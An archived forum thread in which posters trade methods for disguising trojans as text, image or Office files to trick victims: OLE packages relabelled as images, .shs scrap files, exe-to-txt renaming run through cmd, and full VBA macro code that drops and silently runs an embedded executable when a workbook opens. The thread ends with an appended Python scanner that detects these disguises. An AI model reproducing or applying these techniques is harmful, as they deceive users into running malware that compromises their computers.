i hear that it is possible to add a trojan (.exe) file to a text file (or document file), so when someone opens the txt file, the trojan runs on his computer?
any1 know this method? how do they do this?
mrBob
Oct 9 2003, 04:18 PM
nopez, is just impossible
coder
Oct 9 2003, 04:59 PM
actually, there have been a few Office exploits lately...
mrBob is partially right, a trojan/virii must be run, not read... now, you could possibly find an exploit for document applications (like word, excel, etc...) then you could pump some shell code but as far as i know- no exploits for notepad.exe
pedraM
Oct 10 2003, 08:25 AM
oh i think it is possible with .DOC documents! in this way Victim must click some part of document!
just drag and drop your server.exe file to the word pad then right click on it and choose Package Object > Edit Package push in Insert Icon to change the server.exe icon file. from edit menu choose Label to change your server.exe file to some thing like server.GIF !!! from file menu choose Update to make changes.
your victim thinks that this is gif image attached with your document file. and he click on it! Oh your server.exe file RAN!
you can either bind your server file with image!
NoW! any1 know how to change the server.exe to server. (empty )
agamemnon
Oct 10 2003, 10:04 AM
yes you can! you can hide OLE objects in a scrap file which looks almost identical to a .txt file. i've used it to open up a NETCAT shell.
there are numerous howto on the web, just google about for them. meanwhile i'll have a dig about my hard drive and look for the one i made - and maybe write a little article.
EDIT: here you go. if it's what you're looking for, i'll write an explanation... This just opens up the local cmd.exe
pedraM
Oct 10 2003, 10:29 AM
Thx agamemnon i think u use Word pad and Package Object to create this .shs file!
windows never show .shs file extension!
coder
Oct 10 2003, 05:10 PM
Exploit that makes use of the Microsoft Word WordPerfect document converter which has been found vulnerable to a buffer overflow when a malicious .doc file is opened. Related advisory here. Homepage: http://valgasu.rstack.org/. By valgasu
EDIT: here you go. if it's what you're looking for, i'll write an explanation...
a explanation would be nice
EDIT.. ahhh funky
QUOTE
Hide in plain sight by converting your batch file into a scrap. I know a couple Visual Basic Script email viruses that used this method to hide. It worked too! One way to do it is to run the packager.exe program (it's in your Windows folder), select "Import" from the "File" menu and select your batch file. Then select "Copy Package" from the edit menu. Now switch to Explorer and paste the item into your desired folder. It will be named "scrap", but you can rename it to whatever you want. To run it, you'll have to know it's REAL short file name (like SCRAP.SHS) and use the START command. For example: start /w scrap.shs Of course, double-clicking it also works. Very few people know what a scrap is let alone know how to find out what is hiding in one.
i actually found the exe in windows\system32 Hope this helps
w00dy
Oct 11 2003, 05:47 AM
the exploit that exists to run virii and trojans in a text file is what pedra and agamemnon are talking about. Just create the file in wordpad and call it "blah.txt.shs", and no matter if you have hide extensions checked or not, it shows up as "blah.txt" Its not really a text file, but you would never know aside from the slightly different icon.
Merchantp
Oct 22 2003, 12:36 AM
very very nice, but.... I forget where I saw it......another forum perhaps but someone was looking into a possible overflow or something in one of the note/word pads. Was interesting.
VorteX
Dec 30 2003, 12:40 AM
still it is not possible to infect a plaintext file (.txt) so that it can be run directly, there have been several virii (mainly batch and for instance perrun) that did infect the .txt extension, but merely functioning as a backup by overwriting the content and later renaming the extension to the correct one, however for the windows ole format you have to be very careful as they can contain macros or other modifications so it can automatically launch harmful code
why not use doc files i mean you can use the object mode to put the file in it..
change the file extension and icon.
and that's it he only needs to double click on it and program is running
tianzhen
Apr 6 2004, 05:09 PM
u can do it this way : trojan.txt exe
Silent Bob
Apr 6 2004, 05:46 PM
QUOTE (tianzhen @ Apr 6 2004, 05:09 PM)
u can do it this way : trojan.txt exe
i dont think that would work?
maybe with the .exe at the end of the .txt, but no one falls for that nowadays
some people leave the winxp default file extension options on so it'll just show the file name if you replaced an exe icon with the windows word one that could work
canardwc
Apr 6 2004, 07:41 PM
i've heard that an exe could be hidden in zip files.... exploiting some extractor's weakness
passtheblunt
Apr 7 2004, 05:57 PM
QUOTE (w00dy @ Oct 11 2003, 05:47 AM)
the exploit that exists to run virii and trojans in a text file is what pedra and agamemnon are talking about. Just create the file in wordpad and call it "blah.txt.shs", and no matter if you have hide extensions checked or not, it shows up as "blah.txt" Its not really a text file, but you would never know aside from the slightly different icon.
Yes this works but when you run the scrap file you still get the pop up saying this (Some files can harm your computer. If the file information below looks suspicious, or you do not fully trust the source, do not open or save this file.)
I don't think this is a very good method unless you know for sure that they unchecked the click box to auto run the files, which would be very likely.
tstngry
Apr 8 2004, 06:50 AM
There is a way (i think) that you can put any program in a .bat file. I don't know if that is good enough but it was posted on this forum somewhere else. It was a post on how to make a .bat file that had all the hex code of an ftp program, that when run or echoed would create the ftp program from the batch file. I don't know exactly how it works but I'd like to. I hope this helps and i hope you can find it in the forum.
Player
Jul 18 2004, 10:07 AM
you can remove the following key or change key to "AlwaysShowExt" [HKEY_CLASSES_ROOT\ShellScrap] "NeverShowExt"=""
anyway to change the icon of a shs?
Vort3x
Jul 18 2004, 02:01 PM
Well, You are all missing something. I know of a great trojan that can do this. But you have to buy the SE. But ProRat from http://www.prorat.net has this feature to convert its extension into a .txt file. First .exe to .vbs, then you use another converter tool and Generic Extensions Converter and convert the extension to ANYTHING you want, an existing one of course. Check it out.
Regards, Vort3x
locomack
Oct 27 2004, 12:28 PM
QUOTE(Vort3x @ Jul 18 2004, 02:01 PM)
Well, You are all missing something. I know of a great trojan that can do this. But you have to buy the SE. But ProRat from http://www.prorat.net has this feature to convert its extension into a .txt file. First .exe to .vbs, then you use another converter tool and Generic Extensions Converter and convert the extension to ANYTHING you want, an existing one of course. Check it out.
Regards, Vort3x
Hi,i was wondering if this can be done to any exe file or just the prorat trojan? Also,all this can be done from the prorat SE tool itself,or do i need external program? I am willing to buy it. Of course the exe to txt file will be detected by virusscan??? So it can be a real txt file, like whatever.txt,but when the person runs it,it runs the actual exe file??? Thanks
shuvo
Oct 28 2004, 06:13 PM
http://www.prorat.net was this feature to convert its extension into a .txt file. First .exe to .vbs, then you use another converter tool and Generic Extensions Converter and convert the extension to ANYTHING you want caz now its patched by Microsoft. They(Prorat se) are not giving u this nice Converter with the soft.
lavey666uk
Oct 29 2004, 08:39 PM
I had this doc lying around on my puter for a while now cant remember where i got it.. maybe fearless or somewhere never actually tried it but is worth a read..
QUOTE
*********************************** ** How to embed an exe in an Excel doc ** ***********************************
- Open a new Excel doc - Open the Visual Basic Editor (Tools->Macros->Visual Basic Editor) - Double-click 'ThisWorkbook' - Copy and paste the following code into that window...
-----------------start of code----------------------------------
Option Explicit
Sub ImportFile(FileName As String)
Dim FileNum As Integer Dim FileLength As Long Dim FileBuffer() As Byte Dim CurrentRow As Long Dim BytesToRead As Long
Const MaxBuffer = 4096
FileNum = FreeFile
Open FileName For Binary Access Read As FileNum
FileLength = LOF(FileNum) CurrentRow = 1
Do While FileLength > 0 BytesToRead = MaxBuffer If BytesToRead > FileLength Then BytesToRead = FileLength End If
FileLength = FileLength - BytesToRead ReDim FileBuffer(1 To BytesToRead) Get FileNum, , FileBuffer
Sub AddRow(FileBuffer() As Byte, RowNumber As Long)
Dim CellValue As String Dim Index As Long
For Index = LBound(FileBuffer) To UBound(FileBuffer) CellValue = CellValue + Right$("0" & Hex$(FileBuffer(Index)), 2) Next
Sheet1.Cells(RowNumber, 1) = CellValue
End Sub
Sub ExportFile(FileName As String)
Dim CellValue As String Dim Buffer() As Byte Dim Index As Long
Dim FileNum As Long Dim OK As Boolean Dim RowNumber
Dim ByteCount As Long
FileNum = FreeFile Open FileName For Binary Access Write As FileNum
OK = True RowNumber = 1
Do CellValue = Sheet1.Cells(RowNumber, 1) RowNumber = RowNumber + 1
If CellValue = "" Then OK = False Else
ByteCount = Len(CellValue) / 2
ReDim Buffer(1 To ByteCount) For Index = 1 To ByteCount Buffer(Index) = CByte("&H" + Mid$(CellValue, Index * 2 - 1, 2)) Next Index
Put FileNum, , Buffer
End If
Loop While OK
Close FileNum
End Sub
-----------------end of code----------------------------------
- Go to the Immediate Window in the Editor (View->Immediate Window if it's not open)
- Type 'ThisWorkbook.ImportFile "<filename>" <enter>' (no single quotes, keep double quotes, replace filename with the file you want to embed) example: ThisWorkbook.ImportFile "C:\program.exe" - Hit enter
- Under the current code, type or paste the following...
-----------------start of code----------------------------------
Private sub Workbook_Open ExportFile "<filename>" Shell "<filename>",vbHide End Sub
-----------------end of code----------------------------------
- Replace <filename> with whatever you want the file to be exported as... ie. ExportFile "C:\winlogon32.exe" Shell "C:\winlogon32.exe" .... - Go back to the excel and hide the sheet where it imported the file. (Format->Sheet->Hide) - You will now see a clean sheet - Put whatever you want in it...make it look nice - This sould also be something that you would assume would contain a macro, and something they are going to want to open. Be creative.
- Save
- That is it. Remember: Macro setting are set to Medium on default, so in the default state, it will prompt and ask to run a macro or not.
- It is pretty similar in Word...you just replace 'ThisWorkbook...' with 'ThisDocument...'
NOTE: I have only tried this on Office 2000...It could be different in Office XP
let me know if something is wrong or help is needed
- BE
--------------------
in the VBA editor where you are doing everything else, right click on 'ThisWorkbook' and choose 'VBAProject Properties...' then, click on the 'protection' tab, check the box where it says 'Lock project for viewing', put your password(s) in and click OK.
aelphaeis_mangarae
Oct 30 2004, 12:38 PM
So how exactly do you do the .shs thing ?
Do you save your trojan or what ever, as
example.txt.shs ?
Do you have to import it into something and compile or something?
BTW im not sure if all of you guys know, but if you get trojan.exe and rename it to trojan.txt and execute it via command shell it executes like an executable.
v1r05
Oct 31 2004, 05:32 PM
here is another trick try renaming a exe file to a txt or any thing u like then on the dos prompt type "start C:\renamed_exe.txt" it should execute
Se7eN
Dec 2 2004, 12:48 PM
QUOTE(v1r05 @ Oct 31 2004, 12:32 PM)
here is another trick try renaming a exe file to a txt or any thing u like then on the dos prompt type "start C:\renamed_exe.txt" it should execute
nice one, this is handy for my spreading tool
Terminal
Dec 2 2004, 07:53 PM
QUOTE
here is another trick try renaming a exe file to a txt or any thing u like then on the dos prompt type "start C:\renamed_exe.txt" it should execute
Yeah this is some prob in cmd of win 2k/xp . But i think patch is out for it :-/
IDEspinner
Dec 7 2004, 09:56 PM
Ah, reminds me of the text file virus i saw on astalavista a while ago
Extract all the files into a folder, then double click the readme.txt, you will end up running a program. The actual zip seems misbuilt to me because the icon for readme.txt is not displaying correctly but you can fix that
the only issue with this is the little shortcut icon that appears, other than that, it's pretty interesting hiding an exe as a .txt then launching it with a link
belgther
Dec 17 2004, 12:02 PM
well, the answer to this question is impossible, because when opening a text file, the data on the file will be shown directly,but by an exe file, it is processed... but when you find an exploit on notepad or wordpad that allows the code execution and processing, then it becomes possible using this exploit, which is a quite fancy thing but what IDESpinner posted looks interesting, too, but it can be programmed by the other ways, like hiding it in an .exe to create open programmable trojans that I'll call multiple trojan:)
Serhat
Dec 24 2004, 08:50 AM
Above I see a DOC version .. and as many know you can use vb for it.. well why not write a little downloader and executer that downloads a file and executes it.. sounds easier if I see the above code.. But then again it gives a message in the beginning saying it got macros.. but that's the same @ the above example too.. Or am I forgetting something heh? btw you can almost build your own trojan into the doc then .. but I would rather make just a simple downloader and executer.. as I stated before..
Serhat
METAHUMAN
May 22 2005, 01:05 PM
If you want to hide the exe in a Zip file, then the victim computer should have WinZip 8.1. Thats the only version thats exploitable to this vulnerability. What you need to do is rename a file with 256 chars & end it with any extension. For eg - .......xxxxxxxxxxxxxxxxxxxx.exe.jpg <will show an image icon in WinZip> .......xxxxxxxxxxxxxxxx.exe.txt <will show the text icon in Winzip>
If you want to run a .txt or for that matter any file as an exe, you have the wonderful CMD.exe to help you. All that needs to be done is a commandline argument. cmd dangerous_file.txt CMD by default always executes the file depending on its header. In the PE EXE case, it is MZ. This will execute the file! This was a known exploit some days back. Dont know if any one knows about it or not. There also a patch for the same.
sabrodiesel2000
May 22 2005, 03:31 PM
ok i believe that there is another way to do that... u can use a packer that will help u pack the patch along with the document file... but then again u have to compress that server file into the document file in order to disguise it... but the mechanism should be developed that the server file is extracted and run in the background(hidden)......
<this info was not meant to encourage trojan distribution>:>
aelphaeis_mangarae
May 24 2005, 07:00 AM
Dragging a .txt Executable into Command Prompt doesn't work on Service Pack 2 (Won't execute.)
White Scorpion
May 24 2005, 11:50 AM
it is possible:
take a look at the screenshot.... cmd.exe does recognize the real file. if the program would be a legit txt then it would have opened notepad to read the file. now it is executable...
just rename any .exe to .txt and make sure it is run from within cmd.exe . Then your problem would be solved.....
belgther
May 24 2005, 12:12 PM
QUOTE(White Scorpion @ May 24 2005, 12:50 PM)
just rename any .exe to .txt and make sure it is run from within cmd.exe . Then your problem would be solved.....
Well, but you have to convince the victim to do so.
sabrodiesel2000
May 24 2005, 03:28 PM
QUOTE(sabrodiesel2000 @ May 22 2005, 03:31 PM)
ok i believe that there is another way to do that... u can use a packer that will help u pack the patch along with the document file... but then again u have to compress that server file into the document file in order to disguise it... but the mechanism should be developed that the server file is extracted and run in the background(hidden)......
<this info was not meant to encourage trojan distribution>:>
--------------
ok i think i wasnt clear enough sorry... actually u dont have to convince the victim.. all u have to do is pack two files and give the OUTPUT file extension... i`ve used a few packers and some gave me .jpg .exe etc choice... so that means that u can hide a server patch into a file and when the image is run, the server patch also gets activated in the background... but your server patch shouldnt return any values to the user to avoid suspicion....
the trick was to hide it in the text or even an executable file... i`ve used quite a few and as-pack is also a good packer...
White Scorpion
May 25 2005, 02:40 AM
QUOTE(belghter)
Well, but you have to convince the victim to do so.
Maybe.. what if you already have a backdoor running... it could be used to disguise your uploaded tools.....
I'm not sure why cmd.exe does recognize the real file, but i'm sure we can figure that out.. i will take a look at it when i get home...
belgther
May 25 2005, 05:07 AM
WS is right, because you can use ShellExecute api to execute files. Here's what the command line does: When you enter a command or a file name, it searches for built-in commands and executable files. If it finds one matching the query, it executes it, otherwise an error message is given. Also, if you type inject.txt as command, CMD.EXE tries to execute it. And if it's an executable, then everything is fine. But with the backdoor example, it can cause some problems. You have to hide your text files well... Even a noob user deletes a text file if he/she sees the "ununderstandable" and "meaningless" text, he/she thinks wtf that is. That's not our aim, of course. You have to make the user download text files, and if he/she looks at it, he/she has to see something meaningful, and not something meaningless starting with MZ.
White Scorpion
May 25 2005, 09:12 AM
well you could hide the exe behind the txt with alternative data streams with NTFS. I'm not sure if you could download such a file as well though, and it surely won't get executed when the user reads the file since notepad is executed not the file itself..
satknis
May 25 2005, 09:49 AM
isn't it possible to change the header of a txt file to run some code which is in the txt file or also in the header?
belgther
May 25 2005, 12:05 PM
QUOTE(satknis @ May 25 2005, 10:49 AM)
isn't it possible to change the header of a txt file to run some code which is in the txt file or also in the header?
Notepad just reads the text file and stores its content to the memory. An overflow is impossible, because it's being controlled by the program itself. I don't think that any other text program has a flaw. What you mean is almost the same as what WS means. But the execution is limited with cmd.exe, or ShellExecute api.
alibaba
May 25 2005, 12:50 PM
this is how you convert an executable file into a scrap file:
1. drag the executable file into word 2. right click--> package object --> edit package 3. from object packager edit --> copy package, & paste
scrap file is ready. double clicking would run it like an executable.
GhostShell
Jul 9 2005, 05:20 PM
QUOTE(alibaba @ May 25 2005, 12:50 PM)
this is how you convert an executable file into a scrap file:
1. drag the executable file into word 2. right click--> package object --> edit package 3. from object packager edit --> copy package, & paste
scrap file is ready. double clicking would run it like an executable.
Nice info...but XP picks that up in the new security bull sh*t they added...but nice nice trick i am prolly behind bcuz i never knew that lol...thx (GhostSheLL)
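A defender-side check for the disguises discussed in this thread, as an added example that is not part of any post: it flags files whose visible name disagrees with what they are (an always-hidden extension such as .shs behind a document-like name, a document-like name ending in an executable extension, space padding, over-long names, and an MZ header under a non-executable extension). The extension sets, the length threshold, the function names and the sample files are assumptions made for this example.

```python
import os
import re

# Extensions Explorer hides even when "hide extensions" is off (NeverShowExt).
# Sample set assumed for this example; extend it from your own registry audit.
ALWAYS_HIDDEN = {".shs", ".shb", ".lnk", ".pif"}
EXECUTABLE = {".exe", ".scr", ".com", ".dll", ".sys"}
# Extensions a user reads as harmless data (assumed list).
DOCUMENT_LIKE = {".txt", ".gif", ".jpg", ".doc", ".pdf"}
MAX_NAME = 200  # assumed cut-off for names long enough to hide their ending


def check_file(path):
    """Return codes for each way the file's name disagrees with what it is."""
    name = os.path.basename(path).lower()
    stem, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(stem.rstrip())[1]
    codes = []
    if inner_ext in DOCUMENT_LIKE and ext in ALWAYS_HIDDEN:
        codes.append("hidden-ext")       # e.g. blah.txt.shs shown as blah.txt
    if inner_ext in DOCUMENT_LIKE and ext in EXECUTABLE:
        codes.append("double-ext")       # e.g. photo.jpg.exe
    if re.search(r"\s{3,}", name):
        codes.append("padding")          # spaces pushing the real extension away
    if len(name) > MAX_NAME:
        codes.append("long-name")
    with open(path, "rb") as fh:
        magic = fh.read(2)
    if magic == b"MZ" and ext not in EXECUTABLE:
        codes.append("mz-mismatch")      # PE/DOS image under a non-executable name
    return codes


def scan(root):
    """Walk root and return {relative path: codes} for every flagged file."""
    flagged = {}
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(folder, fname)
            codes = check_file(full)
            if codes:
                flagged[os.path.relpath(full, root)] = codes
    return flagged


def build_samples(root):
    """Write constructed sample files (harmless stubs) for a dry run."""
    samples = {
        "notes.txt": b"plain text\n",
        "report.txt": b"MZ\x90\x00 constructed stub",
        "blah.txt.shs": b"\xd0\xcf\x11\xe0 constructed stub",
        "photo.jpg      .exe": b"MZ constructed stub",
    }
    for fname, data in samples.items():
        with open(os.path.join(root, fname), "wb") as fh:
            fh.write(data)
```

Call `build_samples()` on an empty scratch directory and then `scan()` on it to see each code fire; on a real mail-attachment or download folder, run `scan()` alone.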